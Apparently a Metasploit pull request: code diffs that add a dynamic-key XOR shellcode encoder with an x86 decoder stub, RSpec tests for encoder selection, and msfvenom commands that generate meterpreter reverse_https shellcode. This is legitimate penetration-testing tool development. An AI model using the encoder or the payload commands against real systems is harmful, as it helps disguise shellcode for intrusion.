+    "\xeb\x28\x59\x89\xcb\x89\xde\x80\x39\x61\x74\x03\x41\xeb\xf8\x41\x89\xcf\x66\x81\x39\x62\x62\x74\x0f\x8a\x03\x30\x01\x41\x43\x80\x3b\x61\x75\xee\x89\xf3\xeb\xea\xff\xe7\xe8\xd3\xff\xff\xff"
+  end
+
+  def find_key(buf, badchars, keyChars)
+
+    keyFound = nil
+
+    bufLen = buf.length
+
+    # Search for a valid key
+    _minKeyLen = minKeyLen
+    if _minKeyLen < 1
+      _minKeyLen = Integer(buf.length / 100 * (0.2 + 0.05 * badchars.length))
+      if _minKeyLen < 1
+        _minKeyLen = 1
+      end
+    end
+
+    _maxKeyLen = maxKeyLen
+    if _maxKeyLen < 1
+      _maxKeyLen = buf.length
+    end
+
+    for keyLen in _minKeyLen.._maxKeyLen do
+      $stderr.print "\rKey size: #{keyLen}"
+      $stderr.flush
+
+      myKey = ""
+      for x in 0..keyLen - 1 do
+        keyChars.each_char do |j|
+          ok = true
+          i = 0
+          while i + x < bufLen do
+            if badchars[(buf[i + x].ord ^ j.ord).chr]
+              ok = false
+              break
+            end
+
+            i += keyLen
+          end
+
+          if ok
+            myKey << j.chr
+            break
+          end
+
+        end
+      end
+
+      if myKey.length == keyLen
+        keyFound = myKey
+        break
+      end
+    end
+
+    $stderr.print "\n"
+    $stderr.flush
+    return keyFound
+  end
+
+  def encode(buf, badchars = nil, state = nil, platform = nil)
+
+    # Set default badchars if empty
+    badchars = "\x00\x0a\x0d" if (badchars == nil or badchars == '')
+
+    # Check badchars in stub
+    if Rex::Text.badchar_index(stub.gsub(/A/, "").gsub(/BB/, ""), badchars)
+      raise EncodingError, "Bad character found in stub for the #{self.name} encoder.", caller
+    end
+
+    # Set allowed chars
+    keyChars = ""
+    for i in 1..255 do
+      if !badchars[i.chr]
+        keyChars << i.chr
+      end
+    end
+
+    # Find key
+    key = find_key(buf, badchars, keyChars)
+
+    if key == nil
+      raise NoKeyError, "A key could not be found for the #{self.name} encoder.", caller
+    end
+
+    # Search for key terminator
+    keyTerm = nil
+    keyChars.chars.shuffle.each do |i|
+      if !key[i]
+        keyTerm = i
+        break
+      end
+    end
+
+    if keyTerm == nil
+      raise EncodingError, "Key terminator could not be found for the #{self.name} encoder.", caller
+    end
+
+    # Encode paylod
+    pos = 0
+    encoded = ""
+    while pos < buf.length
+      encoded << (buf[pos].ord ^ key[pos % key.length].ord).chr
+      pos += 1
+    end
+
+    # Search for payload terminator
+    payloadTerm = nil
+    keyChars.chars.shuffle.each do |i|
+      break unless keyChars.chars.shuffle.each do |j|
+        if !encoded.index(i + j)
+          payloadTerm = i + j
+          break
+        end
+      end
+    end
+
+    if payloadTerm == nil
+      raise EncodingError, "Payload terminator could not be found for the #{self.name} encoder.", caller
+    end
+
+    finalPayload = stub.gsub(/a/, keyTerm).gsub(/bb/, payloadTerm) + key + keyTerm + encoded + payloadTerm
+
+    # Check badchars in finalPayload
+    if Rex::Text.badchar_index(finalPayload, badchars)
+     raise EncodingError, "Bad character found for the #{self.name} encoder.", caller
+    end
+
+    return finalPayload
+  end
+end

--- a/modules/encoders/x86/xor_dynamic.rb
+++ b/modules/encoders/x86/xor_dynamic.rb
@@ -40,11 +40,11 @@ class MetasploitModule < Msf::Encoder::XorDynamic
     "\xe8\xd3\xff\xff\xff"    # _call:  call  _ret
   end
 
-  def stubKeyTerm
+  def stub_key_term
     /a/
   end
 
-  def stubPayloadTerm
+  def stub_payload_term
     /bb/
   end
 end

--- a/spec/lib/msf/core/encoded_payload_spec.rb
+++ b/spec/lib/msf/core/encoded_payload_spec.rb
@@ -142,14 +142,14 @@ RSpec.describe Msf::EncodedPayload do
       end
 
     end
-    context 'with bad characters: "\\x00\\x0a\\x0d"' do
+    context 'with meterpreter/ bad characters: "\\x00\\x0a\\x0d"' do
       let(:badchars) { "\x00\x0a\x0d".force_encoding('binary') }
       let(:ancestor_reference_names) {
-        %w{singles/linux/x86/meterpreter_reverse_tcp}
+        %w{singles/windows/meterpreter_bind_tcp}
       }
 
       let(:reference_name) {
-        'linux/x86/meterpreter_reverse_tcp'
+        'windows/meterpreter_bind_tcp'
       }
 
       specify 'chooses x86/xor_dynamic' do

--- a/spec/lib/msf/core/encoded_payload_spec.rb
+++ b/spec/lib/msf/core/encoded_payload_spec.rb
@@ -133,8 +133,8 @@ RSpec.describe Msf::EncodedPayload do
     context 'with bad characters: "\\xD9\\x00"' do
       let(:badchars) { "\xD9\x00".force_encoding('binary') }
 
-      specify 'chooses x86/call4_dword_xor' do
-        expect(encoded_payload.encoder.refname).to eq("x86/call4_dword_xor")
+      specify 'chooses x86/xor_dynamic' do
+        expect(encoded_payload.encoder.refname).to eq("x86/xor_dynamic")
       end
 
       specify do
@@ -144,13 +144,6 @@ RSpec.describe Msf::EncodedPayload do
     end
     context 'with bad characters: "\\x00\\x0a\\x0d"' do
       let(:badchars) { "\x00\x0a\x0d".force_encoding('binary') }
-      let(:ancestor_reference_names) {
-        %w{singles/linux/x86/meterpreter_reverse_tcp}
-      }
-
-      let(:reference_name) {
-        'linux/x86/meterpreter_reverse_tcp'
-      }
 
       specify 'chooses x86/xor_dynamic' do
         expect(encoded_payload.encoder.refname).to eq("x86/xor_dynamic")

--- a/spec/lib/msf/core/encoded_payload_spec.rb
+++ b/spec/lib/msf/core/encoded_payload_spec.rb
@@ -133,8 +133,8 @@ RSpec.describe Msf::EncodedPayload do
     context 'with bad characters: "\\xD9\\x00"' do
       let(:badchars) { "\xD9\x00".force_encoding('binary') }
 
-      specify 'chooses x86/call4_dword_xor' do
-        expect(encoded_payload.encoder.refname).to eq("x86/call4_dword_xor")
+      specify 'chooses x86/xor_dynamic' do
+        expect(encoded_payload.encoder.refname).to eq("x86/xor_dynamic")
       end
 
       specify do

--- a/spec/lib/msf/core/encoded_payload_spec.rb
+++ b/spec/lib/msf/core/encoded_payload_spec.rb
@@ -133,8 +133,8 @@ RSpec.describe Msf::EncodedPayload do
     context 'with bad characters: "\\xD9\\x00"' do
       let(:badchars) { "\xD9\x00".force_encoding('binary') }
 
-      specify 'chooses x86/xor_dynamic' do
-        expect(encoded_payload.encoder.refname).to eq("x86/xor_dynamic")
+      specify 'chooses x86/call4_dword_xor' do
+        expect(encoded_payload.encoder.refname).to eq("x86/call4_dword_xor")
       end
 
       specify do
@@ -144,6 +144,13 @@ RSpec.describe Msf::EncodedPayload do
     end
     context 'with bad characters: "\\x00\\x0a\\x0d"' do
       let(:badchars) { "\x00\x0a\x0d".force_encoding('binary') }
+      let(:ancestor_reference_names) {
+        %w{singles/linux/x86/meterpreter_reverse_tcp}
+      }
+
+      let(:reference_name) {
+        'linux/x86/meterpreter_reverse_tcp'
+      }
 
       specify 'chooses x86/xor_dynamic' do
         expect(encoded_payload.encoder.refname).to eq("x86/xor_dynamic")

--- a/spec/lib/msf/core/encoded_payload_spec.rb
+++ b/spec/lib/msf/core/encoded_payload_spec.rb
@@ -142,7 +142,7 @@ RSpec.describe Msf::EncodedPayload do
       end
 
     end
-    context 'with meterpreter/ bad characters: "\\x00\\x0a\\x0d"' do
+    context 'with windows/meterpreter_bind_tcp and bad characters: "\\x00\\x0a\\x0d"' do
       let(:badchars) { "\x00\x0a\x0d".force_encoding('binary') }
       let(:ancestor_reference_names) {
         %w{singles/windows/meterpreter_bind_tcp}

--- a/spec/lib/msf/core/encoded_payload_spec.rb
+++ b/spec/lib/msf/core/encoded_payload_spec.rb
@@ -11,6 +11,7 @@ RSpec.describe Msf::EncodedPayload do
         'x86/shikata_ga_nai',
         # Great rank
         'x86/call4_dword_xor',
+        'x86/xor_dynamic',
         'generic/none',
         ],
       module_type: 'encoder',
@@ -134,6 +135,25 @@ RSpec.describe Msf::EncodedPayload do
 
       specify 'chooses x86/call4_dword_xor' do
         expect(encoded_payload.encoder.refname).to eq("x86/call4_dword_xor")
+      end
+
+      specify do
+        expect(encoded_payload.encoded).not_to include(badchars)
+      end
+
+    end
+    context 'with bad characters: "\\x00\\x0a\\x0d"' do
+      let(:badchars) { "\x00\x0a\x0d".force_encoding('binary') }
+      let(:ancestor_reference_names) {
+        %w{singles/linux/x86/meterpreter_reverse_tcp}
+      }
+
+      let(:reference_name) {
+        'linux/x86/meterpreter_reverse_tcp'
+      }
+
+      specify 'chooses x86/xor_dynamic' do
+        expect(encoded_payload.encoder.refname).to eq("x86/xor_dynamic")
       end
 
       specify do


### PR DESCRIPTION
fixes #10552 , /cc @stefano118

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfvenom -p windows/x64/meterpreter_reverse_https LHOST=127.0.0.1 LPORT=443 --smallest -b '\x00\x0a\x0d\x20' -f c > /tmp/shellcode`
- [x] **Verify** the thing does what it should
- [x] Start `msfvenom -p windows/meterpreter_reverse_https LHOST=127.0.0.1 LPORT=443 --smallest -b '\x00\x0a\x0d\x20' -f c > /tmp/shellcode`
- [x] **Verify** the thing does what it should
- [x] **Implement** unit tests

